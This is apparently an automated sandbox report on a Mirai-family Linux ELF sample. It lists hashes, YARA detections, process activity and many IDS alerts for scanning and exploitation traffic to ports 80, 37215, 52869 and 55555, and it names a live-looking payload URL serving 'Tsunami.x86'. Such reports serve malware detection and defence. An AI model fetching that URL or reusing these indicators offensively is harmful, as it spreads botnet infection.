Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
qJlf2SjoW4

Overview

General Information

Sample Name:qJlf2SjoW4
Analysis ID:626436
MD5:e584f83cd9c878432f7b464ffd70b162
SHA1:1f8ff3ba2051f76fc89641dfba00af74e15ad72a
SHA256:b588d161f6930e582cfd72687ac7d9cf3e1a4884c49a2ca61163d40b2228d491
Tags:32elfmirairenesas
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:626436
Start date and time: 14/05/202202:10:582022-05-14 02:10:58 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 28s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:qJlf2SjoW4
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal92.spre.troj.lin@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: http://103.136.43.52/bins/Tsunami.x86
Command:/tmp/qJlf2SjoW4
PID:6232
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
kebabware installed
Standard Error:
  • system is lnxubuntu20
  • qJlf2SjoW4 (PID: 6232, Parent: 6122, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/qJlf2SjoW4
  • sh (PID: 6289, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • rm (PID: 6319, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • cleanup
SourceRuleDescriptionAuthorStrings
qJlf2SjoW4SUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x113e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x11444:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x114e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
qJlf2SjoW4MAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x1068c:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
qJlf2SjoW4JoeSecurity_Mirai_5Yara detected MiraiJoe Security
    qJlf2SjoW4JoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6232.1.0000000085a0537c.000000003b1b2593.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x4f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      6236.1.0000000085a0537c.000000003b1b2593.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x4f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      6232.1.000000005174e606.000000008584956c.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x113e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x11444:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      • 0x114e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
      6232.1.000000005174e606.000000008584956c.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0x1068c:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
      6232.1.000000005174e606.000000008584956c.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
        Click to see the 5 entries
        Timestamp:192.168.2.2395.58.74.1040992802027121 05/14/22-02:12:12.430631
        SID:2027121
        Source Port:40992
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23112.199.99.10646420802027121 05/14/22-02:11:57.622916
        SID:2027121
        Source Port:46420
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.168.221.10733586802027121 05/14/22-02:12:03.534733
        SID:2027121
        Source Port:33586
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.166.177.10143818802027121 05/14/22-02:13:00.629220
        SID:2027121
        Source Port:43818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.34.12649972802027121 05/14/22-02:12:08.603488
        SID:2027121
        Source Port:49972
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.94.17943008802027121 05/14/22-02:12:47.773346
        SID:2027121
        Source Port:43008
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.97.118.8352268802027121 05/14/22-02:13:23.496514
        SID:2027121
        Source Port:52268
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.218.15945052802027121 05/14/22-02:12:01.397227
        SID:2027121
        Source Port:45052
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.95.11347718802027121 05/14/22-02:11:52.570414
        SID:2027121
        Source Port:47718
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.81.184.18459202555552027153 05/14/22-02:13:37.089436
        SID:2027153
        Source Port:59202
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23156.226.67.16341018528692027339 05/14/22-02:12:09.245036
        SID:2027339
        Source Port:41018
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.78.119.7247502802027121 05/14/22-02:11:52.607486
        SID:2027121
        Source Port:47502
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.118.20437132802027121 05/14/22-02:11:52.802504
        SID:2027121
        Source Port:37132
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.58.76.9256110802027121 05/14/22-02:12:10.137372
        SID:2027121
        Source Port:56110
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.32.17844078802027121 05/14/22-02:12:38.576645
        SID:2027121
        Source Port:44078
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.245.91.21846486555552027153 05/14/22-02:11:53.481665
        SID:2027153
        Source Port:46486
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.211.18138602802027121 05/14/22-02:11:46.055471
        SID:2027121
        Source Port:38602
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.250.7.20843406528692027339 05/14/22-02:12:44.093160
        SID:2027339
        Source Port:43406
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.211.199.20060430802027121 05/14/22-02:11:50.384445
        SID:2027121
        Source Port:60430
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.240.107.7347070528692027339 05/14/22-02:12:25.163577
        SID:2027339
        Source Port:47070
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.182.21341474555552027153 05/14/22-02:12:39.507650
        SID:2027153
        Source Port:41474
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23156.244.105.5134840528692027339 05/14/22-02:13:21.351383
        SID:2027339
        Source Port:34840
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.243.19935434802027121 05/14/22-02:12:04.777246
        SID:2027121
        Source Port:35434
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.245.250.17236862555552027153 05/14/22-02:12:19.660814
        SID:2027153
        Source Port:36862
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.211.226.13853290802027121 05/14/22-02:11:52.555956
        SID:2027121
        Source Port:53290
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.43.238.15338478802027121 05/14/22-02:12:01.401310
        SID:2027121
        Source Port:38478
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.37.25050424555552027153 05/14/22-02:12:56.874950
        SID:2027153
        Source Port:50424
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.213.204.3958836802027121 05/14/22-02:12:23.962062
        SID:2027121
        Source Port:58836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.181.133.20233726802027121 05/14/22-02:12:16.233664
        SID:2027121
        Source Port:33726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.57.130.22852484802027121 05/14/22-02:12:28.116329
        SID:2027121
        Source Port:52484
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.222.1047996802027121 05/14/22-02:12:06.989256
        SID:2027121
        Source Port:47996
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.122.230.16741686802027121 05/14/22-02:13:08.893196
        SID:2027121
        Source Port:41686
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.150.159.10657996802027121 05/14/22-02:12:39.841136
        SID:2027121
        Source Port:57996
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.235.111.19833534528692027339 05/14/22-02:13:20.938260
        SID:2027339
        Source Port:33534
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.24.9855186555552027153 05/14/22-02:12:20.938724
        SID:2027153
        Source Port:55186
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.179.134.1036172802027121 05/14/22-02:12:25.912986
        SID:2027121
        Source Port:36172
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.105.3756502802027121 05/14/22-02:12:16.074396
        SID:2027121
        Source Port:56502
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.164.218.8357352802027121 05/14/22-02:12:33.749896
        SID:2027121
        Source Port:57352
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.159.26.3544678802027121 05/14/22-02:12:23.922852
        SID:2027121
        Source Port:44678
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.235.96.9045400528692027339 05/14/22-02:12:34.950230
        SID:2027339
        Source Port:45400
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.206.17745218802027121 05/14/22-02:12:04.810301
        SID:2027121
        Source Port:45218
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.49.177.24935962802027121 05/14/22-02:13:40.811485
        SID:2027121
        Source Port:35962
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.131.158.15946656802027121 05/14/22-02:12:31.381907
        SID:2027121
        Source Port:46656
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.201.24153716555552027153 05/14/22-02:12:16.062221
        SID:2027153
        Source Port:53716
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.82.23444534802027121 05/14/22-02:12:12.340577
        SID:2027121
        Source Port:44534
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.118.14737452555552027153 05/14/22-02:11:50.031237
        SID:2027153
        Source Port:37452
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.57.134.4659286802027121 05/14/22-02:12:48.996838
        SID:2027121
        Source Port:59286
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.172.4134814555552027153 05/14/22-02:13:11.806884
        SID:2027153
        Source Port:34814
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.210.22942204555552027153 05/14/22-02:12:18.507816
        SID:2027153
        Source Port:42204
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.94.218.4357504802027121 05/14/22-02:11:57.972753
        SID:2027121
        Source Port:57504
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.154.249.12134130802027121 05/14/22-02:12:45.473782
        SID:2027121
        Source Port:34130
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.128.24559816555552027153 05/14/22-02:13:11.806767
        SID:2027153
        Source Port:59816
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.96.5152158802027121 05/14/22-02:13:29.557034
        SID:2027121
        Source Port:52158
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.203.246.6251484802027121 05/14/22-02:12:51.238182
        SID:2027121
        Source Port:51484
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.90.162.18347524802027121 05/14/22-02:12:04.810631
        SID:2027121
        Source Port:47524
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.239.27.7847704802027121 05/14/22-02:13:06.625005
        SID:2027121
        Source Port:47704
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.205.7053328802027121 05/14/22-02:12:03.636693
        SID:2027121
        Source Port:53328
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.151.7759744555552027153 05/14/22-02:11:51.219344
        SID:2027153
        Source Port:59744
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.59.12043352802027121 05/14/22-02:11:45.945989
        SID:2027121
        Source Port:43352
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.153.17343894555552027153 05/14/22-02:13:39.296017
        SID:2027153
        Source Port:43894
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.164.217.3256864802027121 05/14/22-02:12:21.706568
        SID:2027121
        Source Port:56864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.209.130.24155784802027121 05/14/22-02:12:28.187173
        SID:2027121
        Source Port:55784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.210.164.5859344802027121 05/14/22-02:13:46.124204
        SID:2027121
        Source Port:59344
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.250.15159336555552027153 05/14/22-02:13:19.724871
        SID:2027153
        Source Port:59336
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.216.165.11859550802027121 05/14/22-02:12:33.730744
        SID:2027121
        Source Port:59550
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.229.119.8750144802027121 05/14/22-02:12:16.135372
        SID:2027121
        Source Port:50144
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.174.97.23347994802027121 05/14/22-02:13:32.979753
        SID:2027121
        Source Port:47994
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.58.79.12560124802027121 05/14/22-02:12:23.981113
        SID:2027121
        Source Port:60124
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.167.20434184555552027153 05/14/22-02:13:44.962414
        SID:2027153
        Source Port:34184
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.80.201.23847450802027121 05/14/22-02:12:16.046839
        SID:2027121
        Source Port:47450
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.159.51.7337054802027121 05/14/22-02:12:08.430878
        SID:2027121
        Source Port:37054
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.241.123.15756836528692027339 05/14/22-02:12:54.094946
        SID:2027339
        Source Port:56836
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.141.200.19460076802027121 05/14/22-02:12:21.758371
        SID:2027121
        Source Port:60076
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.185.5038634802027121 05/14/22-02:12:38.371591
        SID:2027121
        Source Port:38634
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.241.84.24033824528692027339 05/14/22-02:12:28.673321
        SID:2027339
        Source Port:33824
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.179.143.20351242802027121 05/14/22-02:12:18.506552
        SID:2027121
        Source Port:51242
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.0.30.5660942802027121 05/14/22-02:13:00.841883
        SID:2027121
        Source Port:60942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.86.72.5855354802027121 05/14/22-02:13:14.880883
        SID:2027121
        Source Port:55354
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.97.138.22648964802027121 05/14/22-02:12:57.594704
        SID:2027121
        Source Port:48964
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.104.20234854555552027153 05/14/22-02:13:36.964682
        SID:2027153
        Source Port:34854
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.219.16846204555552027153 05/14/22-02:13:08.554661
        SID:2027153
        Source Port:46204
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2388.87.173.19839632802027121 05/14/22-02:13:19.388360
        SID:2027121
        Source Port:39632
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.81.184.18459304555552027153 05/14/22-02:13:40.473105
        SID:2027153
        Source Port:59304
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.77.28.15555294802027121 05/14/22-02:13:20.332969
        SID:2027121
        Source Port:55294
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.254.15633828555552027153 05/14/22-02:12:11.570207
        SID:2027153
        Source Port:33828
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.158.13150124802027121 05/14/22-02:12:16.061650
        SID:2027121
        Source Port:50124
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.114.9144870555552027153 05/14/22-02:12:34.796192
        SID:2027153
        Source Port:44870
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23184.105.8.21455800555552027153 05/14/22-02:12:52.633661
        SID:2027153
        Source Port:55800
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.44.24046514802027121 05/14/22-02:12:38.385188
        SID:2027121
        Source Port:46514
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.47.138.16839922802027121 05/14/22-02:12:47.737611
        SID:2027121
        Source Port:39922
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.209.147.14345778802027121 05/14/22-02:12:52.880233
        SID:2027121
        Source Port:45778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.6.16650622802027121 05/14/22-02:12:38.425801
        SID:2027121
        Source Port:50622
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.247.30.22451048528692027339 05/14/22-02:12:53.901304
        SID:2027339
        Source Port:51048
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.178.8946468802027121 05/14/22-02:11:57.639904
        SID:2027121
        Source Port:46468
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23197.244.233.15040306372152835222 05/14/22-02:11:51.051598
        SID:2835222
        Source Port:40306
        Destination Port:37215
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.65.107.22051454802027121 05/14/22-02:11:55.090650
        SID:2027121
        Source Port:51454
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.90.100.20642786802027121 05/14/22-02:13:06.577911
        SID:2027121
        Source Port:42786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.250.235.4243474802027121 05/14/22-02:11:52.862391
        SID:2027121
        Source Port:43474
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.61.201.12438168802027121 05/14/22-02:13:04.224191
        SID:2027121
        Source Port:38168
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.249.225.1853758802027121 05/14/22-02:13:19.402088
        SID:2027121
        Source Port:53758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.245.25.10652588555552027153 05/14/22-02:13:19.821621
        SID:2027153
        Source Port:52588
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.216.103.12651132802027121 05/14/22-02:12:00.196178
        SID:2027121
        Source Port:51132
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.143.57.7852982802027121 05/14/22-02:12:04.729513
        SID:2027121
        Source Port:52982
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.244.70.10233740528692027339 05/14/22-02:13:13.435280
        SID:2027339
        Source Port:33740
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.59.176.8254556802027121 05/14/22-02:13:33.021265
        SID:2027121
        Source Port:54556
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.1.5849178802027121 05/14/22-02:11:48.348956
        SID:2027121
        Source Port:49178
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.214.135.17752978802027121 05/14/22-02:12:04.793804
        SID:2027121
        Source Port:52978
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.46.19543134802027121 05/14/22-02:12:13.698098
        SID:2027121
        Source Port:43134
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.173.24048368802027121 05/14/22-02:12:21.633415
        SID:2027121
        Source Port:48368
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.241.182.14738286802027121 05/14/22-02:13:29.655470
        SID:2027121
        Source Port:38286
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.168.228.20548254802027121 05/14/22-02:12:12.332916
        SID:2027121
        Source Port:48254
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.127.3248576555552027153 05/14/22-02:12:11.570325
        SID:2027153
        Source Port:48576
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23197.246.204.4543450372152835222 05/14/22-02:12:18.232296
        SID:2835222
        Source Port:43450
        Destination Port:37215
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.246.12360432555552027153 05/14/22-02:13:32.017204
        SID:2027153
        Source Port:60432
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.34.12649942802027121 05/14/22-02:12:08.354729
        SID:2027121
        Source Port:49942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.187.18739546555552027153 05/14/22-02:12:18.490698
        SID:2027153
        Source Port:39546
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.202.21857140802027121 05/14/22-02:12:33.688142
        SID:2027121
        Source Port:57140
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.244.117.6735262528692027339 05/14/22-02:13:29.101550
        SID:2027339
        Source Port:35262
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.9.132.13054534802027121 05/14/22-02:12:09.942371
        SID:2027121
        Source Port:54534
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.207.17255164555552027153 05/14/22-02:12:51.455000
        SID:2027153
        Source Port:55164
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23156.235.102.24651258528692027339 05/14/22-02:12:57.282371
        SID:2027339
        Source Port:51258
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.165.8142906555552027153 05/14/22-02:12:20.938959
        SID:2027153
        Source Port:42906
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
